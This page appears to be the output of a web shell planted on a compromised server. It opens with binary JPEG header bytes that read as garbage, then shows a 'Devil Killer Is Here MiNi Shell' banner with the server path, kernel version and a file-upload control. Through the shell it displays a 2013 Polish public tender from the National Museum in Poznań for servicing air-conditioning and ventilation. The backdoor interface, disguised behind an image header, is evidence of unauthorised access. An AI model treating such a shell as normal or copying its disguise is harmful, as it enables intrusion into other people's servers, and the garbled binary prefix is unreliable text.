JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130704/259520-N-2013.html

<p class="kh_header"><b>Poznań: Usługa serwisowania klimatyzacji i wentylacji w Gmachu Głównym Muzeum Narodowego w Poznaniu oraz w Pałacu w Rogalinie.</b><br>
<b>Numer ogłoszenia: 259520 - 2013; data zamieszczenia: 04.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Poznaniu , Al. Marcinkowskiego 9, 61-745 Poznań, woj. wielkopolskie, tel. 061 8568132, faks 061 8515898.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnp.art.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa serwisowania klimatyzacji i wentylacji w Gmachu Głównym Muzeum Narodowego w Poznaniu oraz w Pałacu w Rogalinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia publicznego jest serwisowanie instalacji klimatyzacji i wentylacji w Gmachu Głównym  Muzeum Narodowego w Poznaniu, Al. Marcinkowskiego 9 oraz w Pałacu w Rogalinie - Oddziale Muzeum Narodowego w Poznaniu, ul. Arciszewskiego 2.

2.	Zakres czynności serwisowych w Gmachu Głównym MNP:

1)	Główne urządzenia podlegające czynnościom serwisowania:

a)	centrale klimatyzacyjne:

95 szt. central klimatyzacyjnych firmy VTS Klima
10 szt. central klimatyzacyjnych firmy SWEGON
2 szt. central klimatyzacyjnych firmy VBW
5 klimatyzatorów typu split firmy FUJITSU

UWAGA! Centrale klimatyzacyjne (63 szt. spośród wyżej wymienionych) są podwieszane na wysokości ok. 4 m.

b)	nawilżacze parowe:

22 szt. nawilżaczy parowych typu Mk5 SWEGON
19 szt. nawilżaczy parowych firmy NORDMANN

c)	belki chłodzące:
42 szt. belek chłodzących firmy SWEGON

d)	agregaty wody lodowej:
2 szt. agregatu wody lodowej, śrubowe firmy TRANE, typ RTUB 222, wersja wyciszona,
1 szt. agregatu wody lodowej firmy CLIVET

2)	Czynności serwisowe:

a)	Instalacja automatyki - czynności bieżące

CPU: 
sprawdzenie sygnałów alarmowych.
zatrzymanie i wznowienie pracy sterownika
sprawdzenie poprawności reakcji systemu na występowanie stanów alarmowych.
sprawdzenie buforów pamięci z historią alarmów i trendami zmian wartości punktów.
sprawdzenie informacji i punktów start stop.
sprawdzenie stanu baterii.
sprawdzenie stanu i pewności połączeń płyty głównej.
sprawdzenie ustawień prędkości transmisji.
sprawdzenie poprawności działania software u i ewentualna korekta.
sprawdzenie parametrów regulacji.
sprawdzenie danych komórek RACL
sprawdzenie i ustawienie czasu sterownika
diagnostyka błędów podczas rozruchu
sprawdzenie poprawności działania programów czasowych.
sprawdzenie i ewentualna zmiana systemu operacyjnego dla sterownika.
archiwizacja danych min. raz w miesiącu

     Układy We Wy:
sprawdzenie połączeń z CPU
sprawdzenie binarnych sygnałów wejściowych
sprawdzenie analogowych sygnałów wejściowych
sprawdzenie danych wyświetlanych na wyświetlaczu z rzeczywistymi
sprawdzenia działania diod LED
sprawdzenie analogowych sygnałów wyjściowych
sprawdzenie binarnych sygnałów wyjściowych
sprawdzenie statusu podłączonych urządzeń przy pomocy wyświetlacza
sprawdzenie stabilności analogowych sygnałów wejściowych i wyjściowych
sprawdzenie wystąpienia alarmu w przypadku uszkodzenia czujnika
zapis danych korygujących do rejestrów sterownika
pomiar aktualnych wartości i porównanie ich z wartościami zadanymi
Siłowniki:
sprawdzenie poprawności działania napędów elektrycznych
sprawdzenie działania przy sterowaniu ręcznym
sprawdzenie sygnałów zwrotnych i punktów progowych i regulacja
sprawdzenie pod kątem zużycia lub pęknięć
wymiana zużytych elementów 

     Komputerowa centrala nadzoru:
sprawdzenie poprawności i czytelności grafik
sprawdzenie poprawności komunikacji ze sterownikami
sprawdzenie poprawności sygnalizacji w centrali graficznej przy zmianie statusu punktu lub wartości punktu z poziomu sterownika cyfrowego
sprawdzenie poprawności sygnalizacji w sterowniku cyfrowym przy zmianie statusu punktu lub wartości punktu z poziomu centrali graficznej

b)	Centrale klimatyzacyjne i wentylacyjne:
      Konserwacja bieżąca
kontrola parametrów powietrza		
kontrola stanu technicznego central		
 
      Przeglądy okresowe - zgodnie z DTR
wymiana filtrów							
kontrola stanu łożysk silnika 					
sprawdzenie i regulacja napięcia pasów napędowych		
czyszczenie czerpni i nagrzewnic 					
sprawdzenie i kontrola funkcjonowania zaworów, klap powietrznych, siłowników, presostatów 
czyszczenie chłodnic							
kontrola drożności odpływu skroplin z tacy ociekowej		
drożność syfonu lub z pompką skroplin				
kontrola obciążeń silników						 
kontrola zabezpieczeń przeciwzamrożeniowych			- 

c)	Nawilżacze parowe:
      Konserwacja bieżąca
kontrola parametrów pracy nawilżaczy	
kontrola stanu technicznego nawilżaczy	
 
     Przeglądy okresowe- zgodnie z DTR
płukanie filtra siatkowego 						
kontrola stanu cylindrów parowych (w razie potrzeby płukanie)	
konserwacja ogólna -kontrola systemów elektrycznych, zaworów elektromagnetycznych, układu sterowania		
kontrola lanc i przewodów parowych				
 
d)	Agregaty wody lodowej:
      Konserwacja bieżąca
kontrola temperatury wody lodowej					
kontrola ciśnień freonu						
kontrola szczelności							
kontrola ciśnienia oleju						
bieżące usuwanie stwierdzonych nieprawidłowości
 
     Przeglądy okresowe- zgodnie z DTR
kontrola połączeń elektrycznych					
kontrola i regulacja presostatów					
kontrola poziomu i stanu oleju - ewentualna wymiana oleju	
kontrola stanu zawilgocenia czynnika chłodniczego		
kontrola stanu filtrów i suszek - ewentualna ich wymiana 		
test i regulacja urządzeń zabezpieczających			
czyszczenie skraplacza wodnego					
kontrola poprawności i ewentualna regulacja pracy wentylatorów skraplacza	
kontrola zaworu rozprężającego
utrzymanie czystości w pomieszczeniu agregatu wody lodowej					
 
e)	Instalacja wody lodowej - pompy, armatura, zbiornik wody lodowej:
     Konserwacja bieżąca
kontrola stanu technicznego						
kontrola parametrów regulacje i nastawy wg potrzeb		
kontrola pracy urządzeń - pompy, armatura itp.			
kontrola szczelności							
kontrola filtrów, czyszczenie					
kontrola poziomu wody lodowej w zbiorniku, uzupełnianie	
bieżące usuwanie stwierdzonych nieprawidłowości
 
    Przeglądy okresowe - zgodnie z DTR
kontrola ciśnienia i kierunku rotacji w pompach cyrkulacyjnych	
kontrola stanu łożysk w pompach					
kontrola funkcjonowania zaworów elektromagnetycznych		
kontrola instalacji elektrycznej					
obciążenie prądowe pomp						

f)	Szafy z elektryczną aparaturą sterującą:
      Konserwacja bieżąca
stały nadzór i regularna konserwacja urządzeń sterujących		
kontrola i dociskanie złączy elektrycznych				
 
      Przeglądy okresowe
kontrola i czyszczenie spalonych styków w stycznikach i przekaźnikach		
kontrola funkcjonowania lampek sygnalizacyjnych i ich ewentualna wymiana	
utrzymywanie czystości w szafach, tablicach elektrycznych i w pomieszczeniach
technicznych związanych z klimatyzacją	

3.	Zakres czynności konserwacyjnych w Pałacu w Rogalinie:

1)	Główne urządzenia podlegające czynnościom serwisowania:
centrala wentylacyjna VBW Engineering - 1 kpl.
agregat wody lodowej  CLIVET WSAT XSC 70D - 1 szt.
parowy nawilżacz powietrza  MK5 VISUAL 60 - 1 kpl.
klimatyzator GREEN MOBILE typ KYD32NA D - 1 szt. 

2)	Czynności serwisowe:

a)	Urządzenie klimatyzacyjne typu split:
sprawdzenie parametrów niskiego i wysokiego ciśnienia obiegów chłodniczych
sprawdzenie stopnia zanieczyszczenia jednostek wewnętrznych i zewnętrznych  i ich czyszczenie
sprawdzenie stanu łożysk wentylatorów parowników i skraplaczy
sprawdzenie drożności układu wodnego
sprawdzenie zabezpieczeń elektrycznych
sprawdzenie i ewentualna korekta ciśnienia czynnika chłodniczego
uzgodnienia odnośnie dalszej eksploatacji 
poinformowanie Zamawiającego o stanie technicznym urządzeń

b)	Urządzenia wentylacyjne:
kontrola stanu zacisków elektrycznych
sprawdzenie parametrów elektrycznych silników wentylatorów
kontrola stanu i naciągu pasków klinowych, sprawdzenie stanu łożysk wentylatorów, czyszczenie bloku wentylatorowego ze szczególnym uwzględnieniem wirnika wentylatora
ocena stanu technicznego central (sprawdzenie połączeń wewnętrznych i mocowań)
utrzymanie czystości w pomieszczeniu technicznym 
ocena zanieczyszczenia filtrów i ich wymiana 
sprawdzanie stanu , regulacja i przetestowanie automatyki kontrolno pomiarowej
określenie stanu technicznego przepustnic wielopłaszczyznowych, połączeń elastycznych,  przewodów uziemiających
szkolenie personelu obsługującego urządzenia
przekazywanie zaleceń odnośnie dalszej ich eksploatacji

4.	Naprawy, usuwanie awarii:

W przypadku wystąpienia nieprawidłowego działania systemu klimatyzacji i wentylacji bądź jego awarii, Wykonawca zobowiązany jest do:
a)	zapewnienia wykwalifikowanego personelu technicznego do naprawy zgłoszonych nieprawidłowości  bądź awarii w czasie ciągłym (24 godziny na dobę) przy maksymalnym czasie reakcji na zgłoszenie w ciągu 6 godz. od momentu powiadomienia Wykonawcy (za pośrednictwem faksu, telefonu lub maila) o awarii bądź nieprawidłowościach;
b)	 przygotowania kosztorysu cenowego materiałów niezbędnych do usunięcia awarii bądź nieprawidłowości.
UWAGA! Koszt materiałów ponosi Zamawiający.

5.	Wykonawca zobowiązuje się do wykonywania czynności serwisowych, o których mowa w pkt. III 2 i 3  minimum 2 razy w tygodniu w Gmachu Głównym MNP i minimum 2 x w miesiącu w Pałacu w Rogalinie, niezależnie od zasad określonych w pkt. III 4 niniejszej siwz.

6.	Wykonawca zobowiązany jest do przeprowadzania okresowych prób szczelności wszystkich instalacji freonowych (1 x na 3 miesiące) oraz do każdorazowego  sporządzania protokołów z dokonanych pomiarów i przekazywania ich w formie pisemnej Zamawiającemu.

7.	Polisa odpowiedzialności cywilnej.

1)	Wykonawca, którego oferta zostanie uznana za najkorzystniejszą zobowiązany jest do zawarcia na własny koszt polisy odpowiedzialności cywilnej, której przedmiotem jest  ubezpieczenie kontraktu na serwisowanie instalacji klimatyzacji i wentylacji w Gmachu Głównym oraz w Pałacu w Rogalinie,  na sumę gwarancyjną nie mniejszą niż 1 000 000,00 zł, na czas realizacji usługi objętej umową, z zachowaniem zasady ciągłości ubezpieczenia.

2)	Zakres ubezpieczenia odpowiedzialności cywilnej powinien obejmować odpowiedzialność cywilną deliktową i kontraktową, w szczególności odpowiedzialność za: 

a)	szkody wynikające z niewłaściwego wykonania zobowiązania z limitem: 
1.000.000,00 zł 
b)	szkody spowodowane nieumyślnie, w tym szkody powstałe wskutek rażącego 
niedbalstwa z  limitem 1.000.000,00 zł,
c)	 szkody powstałe w związku z wykonywaniem czynności, prac lub usług 
przez podwykonawcę z podlimitem  w  wysokości 500.000,00 zł,
d)	szkody powstałe na skutek wadliwego wykonania czynności, prac lub usług 
spowodowane przez wypadki ubezpieczeniowe powstałe po przekazaniu 
odbiorcy przedmiotu tych czynności, prac lub usług z podlimitem  w 
wysokości      1 000.000,00 zł,
e)	szkody w rzeczach ruchomych przekazanych lub udostępnionych w celu 
wykonania obróbki, naprawy, kontroli, czyszczenia lub innych podobnych 
czynności w ramach usługi świadczonej przez Ubezpieczającego z 
podlimitem w wysokości 1 000.000,00 zł,
f)	szkody w rzeczach znajdujących sie w pieczy, pod dozorem lub kontrolną ubezpieczającego z podlimitem w wysokości 500 000,00 zł,
g)	szkody polegające na czystych stratach finansowych z podlimitem w  
wysokości 200.000,00zł.

3)	Zakres ubezpieczenia nie może wyłączać odpowiedzialności za zniszczenia dzieł sztuki  powstałe w związku z wykonywaniem usługi serwisowania wentylacji i klimatyzacji w Gmachu Gł. MNP i w Pałacu w Rogalinie.

4)	Wykonawca zobowiązany jest do przedłożenia polisy OC najpóźniej na 4 dni przed, określonym przez Zamawiającego, dniem zawarcia umowy.

5)	Złożona przez Wykonawcę polisa OC będzie podlegała weryfikacji przez Zamawiającego pod kątem spełnienia zasad określonych w punkcie 1) i 2).

6)	W przypadku złożenia polisy OC nie spełniającej wymogów określonych  w punkcie 1) i 2), Zamawiający wezwie Wykonawcę do zmiany polisy OC w terminie 2 dni roboczych od dnia wezwania przez Zamawiającego. 

7)	Niezłożenie polisy OC w terminie określonym w pkt. 4) jak również nie złożenie poprawionej polisy OC w terminie określonym w pkt. 6) Zamawiający uzna za przyczynę uniemożliwiającą zawarcie umowy z przyczyn leżących po stronie Wykonawcy, co skutkować będzie zatrzymaniem wadium przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1, 50.71.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości 12 000,00 zł (dwanaście tysięcy).

2.	Termin wniesienia wadium upływa dnia 15.07.2013r. o godz. 10:30. Wadium musi być wniesione na cały okres związania ofertą.

3.	Wadium może być wnoszone w:
1)	w pieniądzu, przelewem na konto bankowe  o numerze: 93 1500 1621 1216 2004 4411 0000,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6  b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.).

4.	Poręczenie  gwarancja musi:
1)	być złożone zgodnie z obowiązującymi przepisami prawa,
2)	być nieodwołalne, bezwarunkowe, płatne na pierwsze żądanie Zamawiającego bez protestu banku firmy ubezpieczeniowej,
3)	zawierać termin obowiązywania  - minimum do końca okresu związania ofertą,
4)	zawierać zobowiązanie Gwaranta/Poręczyciela do wypłaty Zamawiającemu kwoty wadium w okolicznościach, wynikających z art. 46 ust. 4a i  ust. 5 ustawy Pzp.

5.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.

6.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 

7.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

8.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie punktu 5, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.  

9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 

10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli Wykonawca w okresie ostatnich 3  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jeden raz wykonał lub wykonuje usługę serwisowania instalacji wentylacji i klimatyzacji, funkcjonującej w systemie ciągłym, tj.  - 24 godz. na dobę i 365  dni w roku, o parametrach umożliwiających utrzymanie wilgotności na poziomie +- 5% wilgotności względnej i temperatury na poziomie +- 2oC,  w instytucjach gdzie są przechowywane obiekty zabytkowe (np. w muzeach, bibliotekach, galeriach, archiwach); wartość usługi ma być nie mniejsza niż 200 000,00 brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli Wykonawca dysponuje lub będzie dysponował osobą osobami, która posiada:

a) ważne świadectwo kwalifikacji do przeprowadzania okresowych prób szczelności instalacji freonowych - zgodnie z art. 8 ust. 4 ustawy z dnia 20 kwietnia 2004r. o substancjach zubożających warstwę ozonową (Dz. U. z dnia 31.05.2004r Nr 121, poz. 1263 ze zm.),
b) ważne świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją  urządzeń, instalacji i sieci elektroenergetycznych o napięciu co najmniej 1 kV na stanowisku eksploatacji - zgodnie z Rozporządzeniem MGPiPS w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828)
c) ważne świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją  urządzeń, instalacji i sieci elektroenergetycznych o napięciu co najmniej 1 kV na stanowisku dozoru - zgodnie z Rozporządzeniem MGPiPS w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Z wykazu wykonanych głównych usług musi wynikać, że wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jeden raz wykonał lub wykonuje usługę serwisowania instalacji wentylacji i klimatyzacji, funkcjonującej w systemie ciągłym, tj.  - 24 godz. na dobę i 365  dni w roku, o parametrach umożliwiających utrzymanie wilgotności na poziomie +- 5% wilgotności względnej i temperatury na poziomie +- 2oC,  w instytucjach gdzie są przechowywane obiekty zabytkowe (np. w muzeach, bibliotekach, galeriach, archiwach); wartość usługi ma być nie mniejsza niż 200 000,00 brutto (zał. nr 4 do siwz).
Zamawiający nie wymaga informacji o usługach niewykonanych lub wykonanych nienależycie.
Dowód, potwierdzający należyte wykonanie usługi należy dołączyć tylko do usługi spełniającej wyżej określony warunek podmiotowy. 
            Dowodami, potwierdzającymi należyte wykonanie usługi są:
a) poświadczenie lub
b) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
           W przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. 
UWAGA! Zgodnie z § 9 ust. 2 nowego rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów ..., wykonawca, w miejsce dowodów, o których mowa powyżej, może przedkładać dokumenty potwierdzające należyte wykonanie usług, określone w starym rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów... . Tymi dokumentami mogą być np. referencje, protokół odbioru itp.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza: 

1)	zmianę wynagrodzenia w przypadku ustawowej zmiany stawki podatku VAT,

